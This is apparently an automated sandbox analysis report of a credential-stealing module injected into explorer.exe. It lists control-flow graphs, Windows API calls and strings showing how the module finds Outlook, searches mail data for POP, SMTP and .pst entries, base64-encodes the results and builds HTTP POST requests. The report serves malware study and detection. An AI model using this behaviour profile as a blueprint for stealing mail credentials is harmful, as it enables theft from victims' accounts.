                                  • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                  • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                  • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 178 8274a-82763 CreateToolhelp32Snapshot 179 827b9-827bd 178->179 180 82765-8277d Process32First 178->180 181 827ae-827b0 180->181 182 8277f-82793 lstrcmpi 181->182 183 827b2-827b3 CloseHandle 181->183 184 827a0-827a8 Process32Next 182->184 185 82795-8279b call 827be 182->185 183->179 184->181 185->184
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                  • Process32First.KERNEL32(00000000,?), ref: 00082777
                                  • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                  • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                  • String ID: outlook.exe
                                  • API String ID: 868014591-749849299
                                  • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                  • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                  • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                  • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 195 89cf6-89d10 196 89d15 195->196 197 89d16-89d28 196->197 199 89d2a 197->199 200 89d8e-89d8f 197->200 202 89d2c-89d36 199->202 203 89caf-89cbd 199->203 201 89d90-89d95 200->201 204 89d96-89d98 201->204 202->196 207 89d38-89d43 202->207 205 89cbf-89cce 203->205 206 89cd1-89cf4 203->206 208 89d9a-89d9f 204->208 209 89da1 204->209 205->206 206->195 210 89d44-89d4c 207->210 208->209 209->201 211 89da3 209->211 210->210 212 89d4e-89d50 210->212 213 89da8-89daa 211->213 214 89d79-89d88 212->214 215 89d52-89d55 212->215 216 89dac-89db1 213->216 217 89db3-89db7 213->217 214->200 214->208 215->197 218 89d57-89d75 215->218 216->217 217->213 221 89db9 217->221 219 89d7b-89d88 218->219 220 89f3d 218->220 219->208 220->220 222 89dbb-89dc2 221->222 223 89dc4-89dc9 221->223 222->213 222->223 224 89dd8-89dda 223->224 225 89dcb-89dd4 223->225 226 89ddc-89de1 224->226 227 89de3-89de7 224->227 228 89e4a-89e4d 225->228 229 89dd6 225->229 226->227 230 89de9-89dee 227->230 231 89df0-89df2 227->231 232 89e52-89e55 228->232 229->224 230->231 234 89e14-89e23 231->234 235 89df4 231->235 233 89e57-89e59 232->233 233->232 236 89e5b-89e5e 233->236 238 89e34-89e41 234->238 239 89e25-89e2c 234->239 237 89df5-89df7 235->237 236->232 240 89e60-89e7c 236->240 241 89df9-89dfe 237->241 242 89e00-89e04 237->242 238->238 243 89e43-89e45 238->243 239->239 244 89e2e 239->244 240->233 245 89e7e 240->245 241->242 242->237 246 89e06 242->246 243->204 244->204 247 89e84-89e88 245->247 248 89e08-89e0f 246->248 249 89e11 246->249 250 89e8a-89ea0 247->250 251 89ecf-89ed2 247->251 248->237 248->249 249->234 259 89ea1-89ea6 250->259 252 89ed5-89edc 251->252 253 89ede-89ee0 252->253 254 89f00-89f30 VirtualProtect * 2 252->254 256 89ee2-89ef1 253->256 257 89ef3-89efe 253->257 258 89f34-89f38 254->258 256->252 257->256 258->258 260 89f3a 258->260 259->247 261 89ea8-89eaa 259->261 260->220 262 89eac-89eb2 261->262 263 89eb3-89ec0 261->263 262->263 265 89ec9-89ecc 263->265 266 89ec2-89ec7 263->266 266->259
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_88000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                  • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                  • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                  • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 276 829b7-829c7 GetProcessHeap RtlAllocateHeap
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                  • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                  • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                  • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 284 82999-829a3 call 827e2 287 829b5-829b6 284->287 288 829a5-829af GetProcessHeap HeapFree 284->288 288->287
                                  APIs
                                    • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                  • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcessQueryVirtual
                                  • String ID:
                                  • API String ID: 2580854192-0
                                  • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                  • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                  • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                  • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 289 81c39-81c5f call 829b7 RtlMoveMemory 292 81c65-81c6d 289->292 293 81e36-81e3c 289->293 294 81e2d-81e30 292->294 295 81c73-81c75 292->295 294->292 294->293 295->294 296 81c7b-81c80 295->296 296->294 297 81c86-81c8b 296->297 297->294 298 81c91-81c96 297->298 298->294 299 81c9c-81ca0 298->299 300 81cd2-81cd4 299->300 301 81ca2-81cae call 81ffb 299->301 300->294 302 81cda-81cf0 300->302 307 81cc9-81ccc 301->307 308 81cb0-81cb3 301->308 302->294 304 81cf6-81cfa 302->304 304->294 306 81d00-81d0b 304->306 310 81d0d 306->310 311 81d45-81d47 306->311 307->301 309 81cce 307->309 312 81cba-81cbd 308->312 313 81cb5-81cb8 308->313 309->300 315 81d11-81d1d call 81ffb 310->315 311->294 314 81d4d-81d56 311->314 312->307 316 81cbf-81cc2 312->316 313->307 313->312 317 81d58-81d5e 314->317 318 81d74 314->318 326 81d38-81d3b 315->326 327 81d1f-81d22 315->327 316->307 320 81cc4-81cc7 316->320 321 81d6e-81d72 317->321 322 81d60-81d67 call 81ffb 317->322 318->294 324 81d7a-81d81 318->324 320->307 320->309 321->318 322->321 334 81d69-81d6c 322->334 324->294 328 81d87-81d8a 324->328 326->315 329 81d3d-81d41 326->329 331 81d29-81d2c 327->331 332 81d24-81d27 327->332 328->294 333 81d90-81d99 328->333 329->311 331->326 335 81d2e-81d31 331->335 332->326 332->331 336 81e29 333->336 337 81d9f-81da2 333->337 334->317 334->321 335->326 338 81d33-81d36 335->338 336->294 337->336 339 81da8-81de9 call 829b7 RtlMoveMemory RtlZeroMemory StrStrIA 337->339 338->326 338->329 342 81deb-81df5 StrStrIA 339->342 343 81e22-81e24 call 82999 339->343 342->343 344 81df7-81e01 StrStrIA 342->344 343->336 344->343 346 81e03-81e0d StrStrIA 344->346 346->343 347 81e0f-81e19 StrStrIA 346->347 347->343 348 81e1b-81e1d call 81e44 347->348 348->343
                                  APIs
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                  • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                  • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                  • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                  • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                  • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                  • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$HeapMove$AllocateProcessZero
                                  • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                  • API String ID: 1061763166-3069160855
                                  • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                  • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                  • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                  • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 350 81972-819a6 call 829b7 RtlMoveMemory 353 81c2c-81c31 350->353 354 819ac-819b6 350->354 355 819b7-819bb 354->355 356 819c1-819c3 355->356 357 81c17-81c25 355->357 356->357 358 819c9-819ce 356->358 357->355 359 81c2b 357->359 358->357 360 819d4-819db 358->360 359->353 360->357 361 819e1-819e4 360->361 361->357 362 819ea-819fc 361->362 363 819fe-81a05 362->363 364 81a4f-81a51 362->364 367 81a06-81a11 call 81ffb 363->367 365 81c10-81c12 364->365 366 81a57-81a68 364->366 369 81c13 365->369 366->365 368 81a6e-81a72 366->368 375 81a13-81a1e 367->375 376 81a37-81a3a 367->376 368->365 371 81a78-81a7c 368->371 369->357 373 81a7e-81a84 371->373 374 81ad1-81ad3 371->374 379 81a85-81a90 call 81ffb 373->379 374->365 378 81ad9-81adf 374->378 380 81a20-81a23 375->380 381 81a25-81a28 375->381 376->367 377 81a3c-81a4e 376->377 377->364 382 81b00-81b03 378->382 392 81abc-81abf 379->392 393 81a92-81a9d 379->393 380->376 380->381 381->376 384 81a2a-81a30 381->384 386 81ae1-81ae9 382->386 387 81b05-81b07 382->387 384->376 385 81a32-81a35 384->385 385->376 385->377 386->387 389 81aeb-81afa call 81ffb 386->389 390 81c0c 387->390 391 81b0d-81b14 387->391 389->382 389->390 390->365 391->390 396 81b1a-81b1d 391->396 392->379 394 81ac1-81acd 392->394 397 81a9f-81aa5 393->397 398 81aa7-81aad 393->398 394->374 396->390 400 81b23-81b2a 396->400 397->392 397->398 398->392 401 81aaf-81ab5 398->401 400->390 402 81b30-81b33 400->402 401->392 403 81ab7-81aba 401->403 402->390 404 81b39-81b73 call 829b7 RtlMoveMemory RtlZeroMemory 402->404 403->392 403->394 407 81b79-81b83 404->407 408 81c02-81c0a 404->408 407->408 409 81b85-81b8b 407->409 408->369 409->408 410 81b8d-81b9d StrStrIW 409->410 411 81bfb-81bfd call 82999 410->411 412 81b9f-81ba9 StrStrIW 410->412 411->408 412->411 414 81bab-81bb5 StrStrIW 412->414 414->411 415 81bb7-81bc1 StrStrIW 414->415 415->411 416 81bc3-81bcd StrStrIW 415->416 416->411 417 81bcf-81bd8 lstrlenW 416->417 417->411 418 81bda-81bf6 call 829b7 call 82917 call 81e44 call 82999 417->418 418->411
                                  APIs
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                  • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                  • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                  • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                  • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                  • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                  • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                  • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                  • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                  • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                  • API String ID: 76385412-3831209991
                                  • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                  • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                  • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                  • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 426 820a7-82102 call 82415 call 829b7 call 82938 call 824cc 435 8211d-82129 426->435 436 82104-8211b 426->436 439 8212d-8212f 435->439 436->439 440 82403-82412 call 82999 439->440 441 82135-8216c RtlZeroMemory 439->441 445 823fb-82402 441->445 446 82172-8218d 441->446 445->440 447 821bf-821d1 446->447 448 8218f-821a0 call 8243d 446->448 453 821d5-821d7 447->453 454 821a2-821b1 448->454 455 821b3 448->455 456 823e8-823ee 453->456 457 821dd-82239 call 82866 453->457 458 821b5-821bd 454->458 455->458 461 823f0-823f2 call 82999 456->461 462 823f7 456->462 466 8223f-82244 457->466 467 823e1 457->467 458->453 461->462 462->445 468 8225e-8228c call 829b7 wsprintfW 466->468 469 82246-82257 466->469 467->456 472 8228e-82290 468->472 473 822a5-822bc 468->473 469->468 474 82291-82294 472->474 479 822fb-82315 473->479 480 822be-822f4 call 829b7 wsprintfW 473->480 475 8229f-822a1 474->475 476 82296-8229b 474->476 475->473 476->474 478 8229d 476->478 478->473 484 8231b-8232e 479->484 485 823be-823d4 call 82999 479->485 480->479 484->485 488 82334-8234a call 829b7 484->488 493 823dd 485->493 494 823d6-823d8 call 82999 485->494 495 8234c-82357 488->495 493->467 494->493 497 82359-82366 call 8297c 495->497 498 8236b-82382 495->498 497->498 502 82384 498->502 503 82386-82393 498->503 502->503 503->495 504 82395-82399 503->504 505 8239b 504->505 506 823b3-823ba call 82999 504->506 508 8239b call 8296b 505->508 506->485 510 823a0-823ad RtlMoveMemory 508->510 510->506
                                  APIs
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • Part of subcall function 00082938: lstrlen.KERNEL32(0083AE26,?,00000000,00000000,000820E3,75712B62,0083AE26,00000000), ref: 00082940
                                    • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0083AE26,00000001,00000000,00000000), ref: 00082952
                                    • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                  • wsprintfW.USER32 ref: 00082278
                                  • wsprintfW.USER32 ref: 000822E3
                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                  • API String ID: 4204651544-1701262698
                                  • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                  • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                  • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                  • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 511 81ece-81eec StrStrIA 512 81eee-81ef0 511->512 513 81ef5-81f35 RtlMoveMemory * 2 StrStrIA 511->513 514 81fab-81fb3 512->514 515 81fa7 513->515 516 81f37-81f48 StrStrIA 513->516 517 81fa9-81faa 515->517 516->515 518 81f4a-81f5b StrStrIA 516->518 517->514 518->515 519 81f5d-81f68 lstrlen 518->519 520 81f6a 519->520 521 81fa3-81fa5 519->521 522 81f6c-81f78 call 81ffb 520->522 521->517 525 81f7a-81f80 522->525 526 81f9b-81fa1 lstrlen 522->526 527 81f82-81f85 525->527 528 81f87-81f8a 525->528 526->521 526->522 527->526 527->528 528->526 529 81f8c-81f8f 528->529 529->526 530 81f91-81f94 529->530 530->526 531 81f96-81f99 530->531 531->515 531->526
                                  APIs
                                  • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                  • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                  • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                  • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                  • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                  • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                  • lstrlen.KERNEL32(00000000), ref: 00081F64
                                  • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryMovelstrlen
                                  • String ID:
                                  • API String ID: 456560858-0
                                  • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                  • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                  • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                  • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                  • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                  • lstrcmpi.KERNEL32(00000000,0083C16C), ref: 00081E81
                                  • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                  • RtlMoveMemory.NTDLL(0083C16C,00000000,00000000), ref: 000826A2
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                  • String ID:
                                  • API String ID: 2826435453-0
                                  • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                  • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                  • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                  • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                  • CloseHandle.KERNEL32(00000000), ref: 00081966
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                    • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                    • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                  • String ID:
                                  • API String ID: 3402831612-0
                                  • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                  • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                  • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                  • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

                                  Execution Graph

                                  Execution Coverage:13.3%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:223
                                  Total number of Limit Nodes:16
                                  execution_graph 1577 82c18 1578 82c2a 1577->1578 1579 82bf2 11 API calls 1578->1579 1581 82c82 1578->1581 1580 82c45 1579->1580 1580->1581 1582 81141 2 API calls 1580->1582 1583 82c59 1582->1583 1584 82c79 1583->1584 1585 82c5d lstrlen 1583->1585 1588 8105d VirtualFree 1584->1588 1586 82678 6 API calls 1585->1586 1586->1584 1588->1581 1334 83449 RtlEnterCriticalSection 1335 8346e 1334->1335 1336 834ce 1334->1336 1335->1336 1337 835bc RtlLeaveCriticalSection 1335->1337 1367 81274 VirtualQuery 1335->1367 1336->1337 1338 81274 VirtualQuery 1336->1338 1339 834e9 1338->1339 1339->1337 1342 834fd RtlZeroMemory 1339->1342 1366 835b1 1339->1366 1408 82f3d 1342->1408 1344 81274 VirtualQuery 1346 83494 1344->1346 1346->1336 1348 83498 lstrcat 1346->1348 1347 83526 StrToIntA 1347->1337 1349 8353b 1347->1349 1369 82faa 1348->1369 1420 81141 lstrlen lstrlen 1349->1420 1356 83558 1359 83574 1356->1359 1422 8105d VirtualFree 1356->1422 1357 83595 1360 82faa 16 API calls 1357->1360 1423 8104c VirtualAlloc 1359->1423 1363 835aa 1360->1363 1365 82f1f 22 API calls 1363->1365 1364 83585 RtlMoveMemory 1364->1337 1365->1366 1366->1337 1368 8128b 1367->1368 1368->1336 1368->1344 1370 81141 2 API calls 1369->1370 1371 82fbf 1370->1371 1372 82fd1 1371->1372 1373 81141 2 API calls 1371->1373 1376 83129 1372->1376 1424 81000 GetProcessHeap RtlAllocateHeap 1372->1424 1373->1372 1375 82fe6 1425 81000 GetProcessHeap RtlAllocateHeap 1375->1425 1404 82f1f 1376->1404 1378 82ff1 RtlZeroMemory 1379 82f3d 3 API calls 1378->1379 1380 83013 1379->1380 1381 83118 1380->1381 1382 8301e StrToIntA 1380->1382 1384 81011 3 API calls 1381->1384 1382->1381 1383 83038 1382->1383 1385 82f3d 3 API calls 1383->1385 1386 83120 1384->1386 1387 83047 1385->1387 1388 81011 3 API calls 1386->1388 1387->1381 1389 83051 lstrlen 1387->1389 1388->1376 1390 82f3d 3 API calls 1389->1390 1391 83066 1390->1391 1392 81141 2 API calls 1391->1392 1393 83074 1392->1393 1393->1381 1426 81000 GetProcessHeap RtlAllocateHeap 1393->1426 1395 8308b 1396 82f3d 3 API calls 1395->1396 1397 830a4 wsprintfA 1396->1397 1427 81000 GetProcessHeap RtlAllocateHeap 1397->1427 1399 830cc 1400 82f3d 3 API calls 1399->1400 1401 830dd lstrcat 1400->1401 1428 81011 1401->1428 1403 830ee lstrcat lstrlen RtlMoveMemory 1403->1381 1405 82f3c 1404->1405 1406 82f23 CreateThread CloseHandle 1404->1406 1407 8105d VirtualFree 1405->1407 1406->1405 1433 82ed2 1406->1433 1407->1336 1409 82f4b 1408->1409 1410 82f61 1408->1410 1411 81141 2 API calls 1409->1411 1412 81141 2 API calls 1410->1412 1417 82f57 1411->1417 1413 82f66 1412->1413 1414 82fa4 1413->1414 1415 81141 2 API calls 1413->1415 1414->1337 1414->1347 1415->1417 1416 81141 2 API calls 1418 82f8e 1416->1418 1417->1414 1417->1416 1418->1414 1419 82f92 RtlMoveMemory 1418->1419 1419->1414 1421 81162 1420->1421 1421->1337 1421->1356 1421->1357 1422->1359 1423->1364 1424->1375 1425->1378 1426->1395 1427->1399 1429 81274 VirtualQuery 1428->1429 1430 81019 1429->1430 1431 8102d 1430->1431 1432 8101d GetProcessHeap HeapFree 1430->1432 1431->1403 1432->1431 1434 82edd 1433->1434 1435 82f16 RtlExitUserThread 1433->1435 1445 8178c lstrlen 1434->1445 1438 82f0e 1440 81011 3 API calls 1438->1440 1440->1435 1443 82f07 1444 81011 3 API calls 1443->1444 1444->1438 1446 817d3 1445->1446 1447 817a4 CryptBinaryToStringA 1445->1447 1446->1438 1451 81b1b 1446->1451 1447->1446 1448 817b7 1447->1448 1463 81000 GetProcessHeap RtlAllocateHeap 1448->1463 1450 817c2 CryptBinaryToStringA 1450->1446 1452 81b3e 1451->1452 1453 81b31 lstrlen 1451->1453 1464 81000 GetProcessHeap RtlAllocateHeap 1452->1464 1453->1452 1455 81b46 lstrcat 1456 81b7b lstrcat 1455->1456 1457 81b82 1455->1457 1456->1457 1465 8186c 1457->1465 1460 81011 3 API calls 1461 81ba5 1460->1461 1462 8105d VirtualFree 1461->1462 1462->1443 1463->1450 1464->1455 1488 81000 GetProcessHeap RtlAllocateHeap 1465->1488 1467 81890 1489 8106c lstrlen MultiByteToWideChar 1467->1489 1469 8189f 1490 817dc RtlZeroMemory 1469->1490 1472 818f1 RtlZeroMemory 1475 81926 1472->1475 1473 81011 3 API calls 1474 81b10 1473->1474 1474->1460 1476 81af3 1475->1476 1492 81000 GetProcessHeap RtlAllocateHeap 1475->1492 1476->1473 1478 819e2 wsprintfW 1479 81a02 1478->1479 1487 81add 1479->1487 1493 81000 GetProcessHeap RtlAllocateHeap 1479->1493 1480 81011 3 API calls 1480->1476 1482 81a70 1483 81ad6 1482->1483 1494 8104c VirtualAlloc 1482->1494 1485 81011 3 API calls 1483->1485 1485->1487 1486 81ac6 RtlMoveMemory 1486->1483 1487->1480 1488->1467 1489->1469 1491 817fe 1490->1491 1491->1472 1491->1476 1492->1478 1493->1482 1494->1486 1495 82c8a 1503 82bf2 1495->1503 1497 82c9b 1498 82ca1 lstrlen 1497->1498 1499 82cc6 1497->1499 1508 82678 1498->1508 1523 8224c 